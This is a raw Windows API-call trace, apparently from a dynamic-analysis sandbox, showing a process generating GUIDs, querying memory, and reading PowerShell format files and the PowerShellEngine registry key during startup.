	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x95680d64, Data2=0xc6f6, Data3=0x4e5a, Data4=([0]=0xa4, [1]=0x93, [2]=0x64, [3]=0x83, [4]=0x65, [5]=0x7b, [6]=0x64, [7]=0x74))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x28f642f8, Data2=0x1584, Data3=0x48ca, Data4=([0]=0xae, [1]=0x76, [2]=0xfe, [3]=0x2d, [4]=0x64, [5]=0xc1, [6]=0x19, [7]=0x3f))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x838016e5, Data2=0x1180, Data3=0x429d, Data4=([0]=0xab, [1]=0x19, [2]=0xff, [3]=0xa0, [4]=0xaa, [5]=0xa9, [6]=0xa6, [7]=0x81))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4d5691fa, Data2=0x1938, Data3=0x4cc2, Data4=([0]=0xa9, [1]=0x4d, [2]=0x47, [3]=0xb5, [4]=0xdf, [5]=0x35, [6]=0xf1, [7]=0xc6))) returned 0x0
	[0354.085] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x92093296, Data2=0x5547, Data3=0x4af2, Data4=([0]=0x81, [1]=0x27, [2]=0xcf, [3]=0x75, [4]=0x63, [5]=0x91, [6]=0xef, [7]=0x18))) returned 0x0
	[0354.086] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x55737622, Data2=0x92b1, Data3=0x4338, Data4=([0]=0xb2, [1]=0x42, [2]=0xca, [3]=0xfc, [4]=0x36, [5]=0x29, [6]=0x70, [7]=0x96))) returned 0x0
	[0354.086] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x9c49d28b, Data2=0xa56, Data3=0x4923, Data4=([0]=0x9f, [1]=0xea, [2]=0x60, [3]=0x66, [4]=0x67, [5]=0x84, [6]=0x1d, [7]=0x12))) returned 0x0
	[0354.086] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xde4ff0fb, Data2=0xe6ab, Data3=0x4d24, Data4=([0]=0x97, [1]=0x88, [2]=0x9b, [3]=0x2f, [4]=0xe7, [5]=0xe2, [6]=0x68, [7]=0xef))) returned 0x0
	[0354.086] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7db4ba52, Data2=0xf16a, Data3=0x40e0, Data4=([0]=0xaa, [1]=0x29, [2]=0xea, [3]=0x75, [4]=0xd1, [5]=0x20, [6]=0x42, [7]=0xb9))) returned 0x0
	[0354.086] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.088] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.090] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.090] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd50b67b6, Data2=0x9668, Data3=0x4982, Data4=([0]=0x89, [1]=0xc4, [2]=0xb9, [3]=0xc5, [4]=0xc1, [5]=0xa7, [6]=0x83, [7]=0xc2))) returned 0x0
	[0354.090] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x86eb134, Data2=0xe22a, Data3=0x49e2, Data4=([0]=0xbf, [1]=0xe2, [2]=0xef, [3]=0x85, [4]=0x7b, [5]=0x48, [6]=0xf3, [7]=0xfe))) returned 0x0
	[0354.090] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x666c43a3, Data2=0x3015, Data3=0x41a7, Data4=([0]=0xbe, [1]=0x3, [2]=0xec, [3]=0xc0, [4]=0x78, [5]=0x8b, [6]=0x22, [7]=0x89))) returned 0x0
	[0354.090] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x580a22c4, Data2=0x95ae, Data3=0x4764, Data4=([0]=0xbf, [1]=0xca, [2]=0x37, [3]=0x10, [4]=0x5e, [5]=0xc9, [6]=0xa5, [7]=0x7))) returned 0x0
	[0354.090] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb28de63e, Data2=0x6b98, Data3=0x49a6, Data4=([0]=0xbc, [1]=0x17, [2]=0x8, [3]=0xd6, [4]=0xbe, [5]=0x78, [6]=0xaa, [7]=0x64))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xde054d0e, Data2=0xc545, Data3=0x45f4, Data4=([0]=0x89, [1]=0x2d, [2]=0x82, [3]=0x92, [4]=0x26, [5]=0x95, [6]=0x2d, [7]=0x8d))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x941e6184, Data2=0x412a, Data3=0x4bfd, Data4=([0]=0xbf, [1]=0xa3, [2]=0x78, [3]=0x8f, [4]=0x18, [5]=0x5e, [6]=0xbe, [7]=0x70))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x2a66a051, Data2=0xbf34, Data3=0x4828, Data4=([0]=0x86, [1]=0x9e, [2]=0x8b, [3]=0x3, [4]=0x99, [5]=0x8f, [6]=0x53, [7]=0x14))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xf0e0520d, Data2=0x6181, Data3=0x4ea7, Data4=([0]=0x8f, [1]=0x5a, [2]=0x93, [3]=0x73, [4]=0xc9, [5]=0xb3, [6]=0xc, [7]=0xea))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x9a5528a1, Data2=0x8b75, Data3=0x4a97, Data4=([0]=0xa3, [1]=0xfc, [2]=0xda, [3]=0xb2, [4]=0x34, [5]=0x73, [6]=0x9a, [7]=0x6d))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x92e68e89, Data2=0x5f68, Data3=0x45e8, Data4=([0]=0xaa, [1]=0x15, [2]=0xc2, [3]=0xd1, [4]=0x85, [5]=0xb3, [6]=0x4a, [7]=0x65))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4366b64d, Data2=0xb6fb, Data3=0x40e1, Data4=([0]=0xb0, [1]=0xff, [2]=0xdc, [3]=0x18, [4]=0x13, [5]=0x19, [6]=0x68, [7]=0x6a))) returned 0x0
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8f2df425, Data2=0x7ae8, Data3=0x4f62, Data4=([0]=0xb4, [1]=0x14, [2]=0x2f, [3]=0x8c, [4]=0x3b, [5]=0x6c, [6]=0x1f, [7]=0xc9))) returned 0x0
	[0354.091] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.091] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7956e672, Data2=0x1386, Data3=0x4cde, Data4=([0]=0xad, [1]=0xf, [2]=0xe0, [3]=0x2b, [4]=0x44, [5]=0x3, [6]=0xb3, [7]=0xc))) returned 0x0
	[0354.092] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.249] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.250] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x2cbcccc4, Data2=0x55a9, Data3=0x4983, Data4=([0]=0xa5, [1]=0xd7, [2]=0x6a, [3]=0xa7, [4]=0x9e, [5]=0xe9, [6]=0x8, [7]=0xa8))) returned 0x0
	[0354.250] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.250] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7099e5c6, Data2=0x9d2d, Data3=0x4731, Data4=([0]=0x9b, [1]=0x50, [2]=0x30, [3]=0xf, [4]=0xc6, [5]=0xe1, [6]=0xe9, [7]=0x78))) returned 0x0
	[0354.250] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x9c1f3a20, Data2=0xd813, Data3=0x4ee8, Data4=([0]=0x96, [1]=0x41, [2]=0x6e, [3]=0x19, [4]=0xa6, [5]=0xb9, [6]=0x1c, [7]=0xfc))) returned 0x0
	[0354.250] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xc6448cb5, Data2=0xfe26, Data3=0x49d1, Data4=([0]=0x83, [1]=0x42, [2]=0x44, [3]=0xab, [4]=0x8c, [5]=0x35, [6]=0x3f, [7]=0x76))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x615552f, Data2=0xfeb, Data3=0x4e13, Data4=([0]=0x9f, [1]=0x75, [2]=0xce, [3]=0xac, [4]=0x79, [5]=0x35, [6]=0x6a, [7]=0xcc))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7e1d8993, Data2=0x8141, Data3=0x4c76, Data4=([0]=0x97, [1]=0xb0, [2]=0xc5, [3]=0x56, [4]=0x16, [5]=0xfb, [6]=0x43, [7]=0x54))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8865643b, Data2=0x22, Data3=0x411f, Data4=([0]=0xbe, [1]=0x38, [2]=0x31, [3]=0x72, [4]=0x1d, [5]=0x82, [6]=0xfc, [7]=0x57))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7b45e946, Data2=0x82c9, Data3=0x4382, Data4=([0]=0xb8, [1]=0xe0, [2]=0x4f, [3]=0xb0, [4]=0x8a, [5]=0xd8, [6]=0x60, [7]=0x56))) returned 0x0
	[0354.251] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xaf07c8a1, Data2=0x120a, Data3=0x4891, Data4=([0]=0xa3, [1]=0xf8, [2]=0x65, [3]=0x50, [4]=0xf7, [5]=0x93, [6]=0x32, [7]=0xbc))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb0640455, Data2=0xf453, Data3=0x4f10, Data4=([0]=0x80, [1]=0xde, [2]=0x51, [3]=0x21, [4]=0xc, [5]=0x5a, [6]=0xc5, [7]=0x2f))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x209a0f42, Data2=0xcc8, Data3=0x4776, Data4=([0]=0x86, [1]=0x5d, [2]=0x8f, [3]=0xd2, [4]=0x13, [5]=0x4f, [6]=0x12, [7]=0x8f))) returned 0x0
	[0354.251] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x934f2c8c, Data2=0x2038, Data3=0x4874, Data4=([0]=0xa6, [1]=0x1, [2]=0xdc, [3]=0x8a, [4]=0xc8, [5]=0x2b, [6]=0xfd, [7]=0x44))) returned 0x0
	[0354.252] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xc52fca28, Data2=0xc846, Data3=0x4315, Data4=([0]=0x86, [1]=0xb2, [2]=0xd, [3]=0x20, [4]=0x84, [5]=0xea, [6]=0x3e, [7]=0xfe))) returned 0x0
	[0354.252] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.252] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x35802c1f, Data2=0xd9f4, Data3=0x49ef, Data4=([0]=0x86, [1]=0xad, [2]=0x99, [3]=0x64, [4]=0x2a, [5]=0x20, [6]=0xb5, [7]=0xbb))) returned 0x0
	[0354.252] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xe7563fb7, Data2=0xdb7f, Data3=0x4c39, Data4=([0]=0xa7, [1]=0x2a, [2]=0x81, [3]=0x8a, [4]=0x4c, [5]=0x3e, [6]=0xe0, [7]=0x2b))) returned 0x0
	[0354.252] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.252] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.252] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.252] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0354.252] SetErrorMode (uMode=0x1) returned 0x1
	[0354.253] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0354.253] SetErrorMode (uMode=0x1) returned 0x1
	[0354.253] GetFileType (hFile=0x1cc) returned 0x1
	[0354.253] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x8b4, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x314753c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x314753c*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.254] ReadFile (in: hFile=0x1cc, lpBuffer=0x3148120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3148120*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0354.254] SetErrorMode (uMode=0x1) returned 0x1
	[0354.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0354.255] SetErrorMode (uMode=0x1) returned 0x1
	[0354.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0354.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x1cc) returned 0x0
	[0354.255] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0354.255] CoTaskMemAlloc (cb=0x5a) returned 0x3cc550
	[0354.255] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3cc550, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0354.255] CoTaskMemFree (pv=0x3cc550) 
	[0354.255] RegCloseKey (hKey=0x1cc) returned 0x0
	[0354.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0354.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0354.256] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa9d5481e, Data2=0x83cd, Data3=0x4af4, Data4=([0]=0xb5, [1]=0x70, [2]=0xdf, [3]=0x42, [4]=0xa5, [5]=0x75, [6]=0xfd, [7]=0x7))) returned 0x0
	[0354.256] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xf4b78a7f, Data2=0xc410, Data3=0x4070, Data4=([0]=0x93, [1]=0xe5, [2]=0x13, [3]=0x93, [4]=0x35, [5]=0x0, [6]=0x3f, [7]=0xf6))) returned 0x0
	[0354.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0354.256] SetErrorMode (uMode=0x1) returned 0x1
	[0354.256] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0354.256] SetErrorMode (uMode=0x1) returned 0x1
	[0354.256] GetFileType (hFile=0x1cc) returned 0x1
	[0354.256] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.257] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.257] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.257] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0354.257] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0xe98, lpOverlapped=0x0) returned 1
	[0354.258] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185508, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185508*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.258] ReadFile (in: hFile=0x1cc, lpBuffer=0x3185f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3185f08*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0354.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0354.258] SetErrorMode (uMode=0x1) returned 0x1
	[0354.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0354.258] SetErrorMode (uMode=0x1) returned 0x1
	[0354.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0354.258] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x1cc) returned 0x0
	[0354.258] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0354.258] CoTaskMemAlloc (cb=0x5a) returned 0x3cc550
	[0354.258] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3cc550, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0354.258] CoTaskMemFree (pv=0x3cc550) 
	[0354.258] RegCloseKey (hKey=0x1cc) returned 0x0
	[0354.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0354.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
